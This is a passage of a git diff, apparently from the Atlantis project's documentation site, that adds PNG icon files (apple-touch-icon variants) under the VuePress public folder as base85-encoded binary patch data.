(|x=o{S47Er8yQ5+diSv%zPBiPh-5V}K{`d*dtW z!ApACrNJsXQgsbh;~Kjsmez^!DH$fy7l-MLKaUudU4Ul*BbWyp4W-#q+~9qYZ^%MP zr-zwzgx#)%(tBafChyr|jF<-r4sm)pN(YV}pWp4ddKJMqw2WX`V2ofa!7{V8sSh61o++wZ>jvcDoY{t_NF^8ku@`!0c5 zRewAt!|0yOv|uJ^ha{dCi%FN+`#Lumf!Si-zKiIjtCu)__sF|8ov$p}(94gpEOW;r@7i>N*dY-UdoX}mHdy?GWy~SJ>ao{p zA+wZ9b~=-tf>;^`+8g@k0b`6DS~ghx1j&=V*~fsdyKmo{8!dNN`jtb;4IV6m9 z+#a#>of|8Kymhk(72mpPU{C#)N!#ja!f?0aNXIP&<6rtRVMM4D^485e-?=gTPNU5gJN?ObC-ynN1j+jnlg^y^v8h*vHBw-Oy+ z-G$4LUW|U#C}&$Ac=SD&e!d5!{l#JWyr-8AFIqA3`6I_?%1y_;D|v9Lv&*86iXERx z70?f+6WxpY$A}1d+xpm=6(gUgv+Zf}(qk@u-wwZY(;6;XG5qPAZ9XI-UTh5eMgOWe ziXvXlHXmBEV))Zvx@k?;$Gjc#=r+xFrE9;i@1~aH{)>kWcAor5Qdc|GHzqwnFC8OD zC1+cI_?`D$x|8hB!qc>*KNc{6cl|$4Y-zUK|L{EB^sC?~S|U^VoOScJ|9JD>UhRs7 zQFi+H>NzXz#xEZjtkjyHay{?XUQXmvowsv=0kDj@Z?KgA=&nE5Sn1NfMQc#zU*B}Y zTzlWXH#?5^8PC&KMyF!aotyP7`@)!r{8ldpV~jj++vc|K+H9p@tIkzrv&e|-Hb(9lDiS@p@FzA@)igVOZwokz^k({me} zEq9xzdZT*!8c#KUHjbhZX^N32jmWNi&U$dw1w#k!_kEg|h2l2oY&57_z69p?zVdu| zcD{b4<9b)B>gB4e2iD?$$T#e%8UQ2W0kgm{;6)J*iO93IW%djY6!(1fmRHtEP9(kR cb5@xD0sM*fPov1GnE(I)07*qoM6N<$f?RHE>;M1& literal 0 HcmV?d00001 diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png new file mode 100644 index 0000000000000000000000000000000000000000..0d98ab1ac54b6242b188bb3eb7f9f82293f67057 GIT binary patch literal 5739 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 